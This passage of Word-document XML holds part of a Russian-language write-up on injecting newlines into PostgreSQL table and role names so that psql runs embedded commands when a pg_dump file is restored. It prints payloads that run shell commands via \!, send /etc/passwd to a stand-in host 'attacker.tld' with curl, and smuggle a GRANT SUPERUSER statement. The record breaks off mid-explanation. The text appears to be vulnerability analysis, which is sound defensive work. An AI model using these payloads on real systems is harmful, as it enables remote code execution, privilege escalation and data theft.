        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или собственную user-schema; PG ≤ 14 — public по умолчанию).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700DD6BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF3F9EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE "public"."innocent_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8279A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! id &gt; /tmp/pg_pwned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A440B8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\echo backdoor active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853C3C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! curl -X POST http://attacker.tld/log -d \"@/etc/passwd\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6089DF69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\echo done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CBB9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--" (data text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC5D179" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>DBA / CI запускает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7601D037" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump -d production &gt; /tmp/backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DD633" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># ... перенос на staging-host ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482F450F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql -d staging -f /tmp/backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587924D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/backup.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> будет:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8653FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5130F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Name: innocent_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0003F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! id &gt; /tmp/pg_pwned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A6312E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\echo backdoor active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B95F58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! curl -X POST http://attacker.tld/log -d "@/etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B7E33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\echo done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17752C18" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--; Type: TABLE; Schema: public; Owner: evil_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052945BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B649C1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC57FBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE public."innocent_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC25DE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! id &gt; /tmp/pg_pwned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67989A6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... (тот же текст в quoted form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468C340" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" (data text);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221759ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>При psql-restore:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E18D3F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Первый блок</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (комментарий с newline-разрывом): psql видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Name: innocent_table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комментарий. Затем newline — конец комментария.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF493EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`\!`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — psql meta-command (см. 3.9.7) — исполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id &gt; /tmp/pg_pwned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на хосте, где запущен psql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DB2C62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`\echo`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — psql meta-command — выводит текст. Безобиден; используется как маркер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3342842B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`\!`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — второй call, exfiltration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на attacker-controlled host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D533EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`--; Type: TABLE...`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — psql видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> снова, остаток комментария до end-of-line.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335B775" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`CREATE TABLE ...`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — quoted-identifier form, PG обрабатывает корректно; таблица создаётся.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECBCB5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Результат: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RCE на host, где запущен psql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — обычно это admin-машина DBA или CI-runner. Имя таблицы создалось «как должно», что снижает подозрения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4569AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — SQL injection при pg_restore (без psql, без `\!`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F40935" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_restore -d staging &lt; /tmp/backup.dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (binary format), а не psql, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meta-commands не работают (pg_restore — это бинарный restorer, не client). Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через разрыв комментария — работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D121DA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0882FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE "innocent_role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4095C601" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SUPERUSER TO innocent_role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9E0B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8EA9D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump --format=plain</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45168362" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBB1E1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Name: innocent_role; Type: ROLE; Schema: -; Owner: -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247F44BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C9FFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65126F85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE "innocent_role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4D2D84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SUPERUSER TO innocent_role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED7DF85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA6BE7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>При psql-restore (plain-format всегда через psql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E6C50F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--\n-- Name: innocent_role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комментарий до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (это шапка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t>, без newline-в-имени-проблем).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522AFC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n; Type: ROLE; Schema: -; Owner: -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — новый комментарий (начинается с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
